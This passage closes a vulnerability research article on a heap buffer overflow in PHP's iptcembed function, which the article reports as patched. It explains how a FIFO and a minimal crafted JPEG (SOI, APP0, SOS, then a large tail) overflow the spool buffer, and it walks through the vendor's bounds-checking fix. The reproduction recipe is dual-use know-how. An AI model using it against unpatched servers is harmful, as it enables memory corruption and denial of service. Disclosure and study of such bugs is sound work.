SUMMARY: AddressSanitizer: heap-buffer-overflow /home/administrator/php/php-src/ext/standard/iptc.c:102 in php_iptc_get1

This is a brief two-terminal scenario: we construct the JPEG structure to force the parser into a “read everything until EOF” mode, and then continue feeding bytes to force the buffer out of bounds.

Why a FIFO and two terminals?

For a FIFO, st_size == 0, making the allocated spoolbuf far too small. For a regular file, st_size is approximately equal to the actual size, which often prevents the overflow—unless the file is growing concurrently.
Reading from a FIFO blocks until a writer connects, which is why two terminals are required.
The writer controls how much data is sent after the buffer is allocated, guaranteeing an overflow with a massive tail.

Why these specific JPEG bytes?

FF D8 (SOI) marks the beginning of the JPEG.
FF E0 00 10 + “JFIF” + 9 null bytes form a minimal APP0 (JFIF) segment with a declared length of 16 (2 bytes for length + 14 bytes of payload). This forces the parser to accept the file and follow the APP0 path (the code expects APP0 to be present).
FF DA 00 08 + 6 null bytes constitute a minimal start of scan (SOS) segment. Following the SOS, the code calls the php_iptc_read_remaining function and copies the remainder of the stream until EOF into spoolbuf without checking its capacity.
The A * 8MiB tail forces a large amount of data to be copied into an undersized buffer.

Why is spool used by default? In the iptcembed function, spool = 0 by default, which allocates and populates spoolbuf. If spool >= 2, the spoolbuf buffer is not used, and the function returns TRUE instead of a string. In this scenario, the heap buffer overflow does not occur.

Fix

The vendor introduced changes on November 26, 2025 and offered the fix.

A spoolbuf_end parameter was added to the php_iptc_get1 and php_iptc_put1 functions (which append bytes to spoolbuf) and their call chains to enforce bounds checking. Instead of writing out of bounds, these functions now safely return EOF when the buffer is full.

Fix in the php-src/ext/standard/iptc.c file

if (spoolbuf) {
  if (UNEXPECTED(*spoolbuf >= spoolbuf_end)) {
    return EOF;
  }
  *(*spoolbuf)++ = c;
}

Consequently, if reading or copying stops before EOF when the buffer is full, the result may be truncated, but no memory corruption occurs. In the iptcembed function, the boundary for spoolbuf is calculated, and the execution flow proceeds.

Fix in the php-src/ext/standard/iptc.c file

spoolbuf_end = poi + ZSTR_LEN(spoolbuf);

An error path (goto err) was added for write operations. If php_iptc_put1 returns EOF because spoolbuf is full, iptcembed jumps to the err label, properly frees the memory, and returns FALSE instead of operating on corrupted memory. Before calling zend_string_truncate, a terminating null byte (*poi = '\0'); is explicitly set to ensure the string is properly terminated, even if the read operation stops early due to a full buffer.

Conclusion

In this article, we looked “under the hood” of PHP using the ext/standard module as an example, focusing on image processing and related heap memory bugs. We demonstrated that behind familiar native functions lies C code that directly processes untrusted data.

Our analysis confirmed that even in mature components, such code segments remain a source of vulnerabilities. Specifically, we analyzed a memory disclosure in getimagesize (CVE-2025-14177) and a heap buffer overflow in iptcembed. Both issues have now been patched, but their existence underscores the importance of auditing low-level mechanisms, especially where external data formats are parsed.

🐘 Thank you for reading this research, and see you next time!

Author

Key components and their roles

How it works: from PHP code to execution result

Standard extension

Detected issues

Memory disclosure when reading JPEG APP segments in the getimagesize function

Description

Technical details

Root cause: incorrect chunk concatenation in php_read_stream_all_chunks

From a public issue to a security issue with the subsequent assignment of a CVE identifier

Exploitation

Proof of concept 1. Original report. Reproduction via php://filter.

Proof of concept 2. Post-feedback. Reproduction without filters, web-like scenario

Fix

Heap buffer overflow in the iptcembed function

Description

Technical details

Exploitation

Fix

Conclusion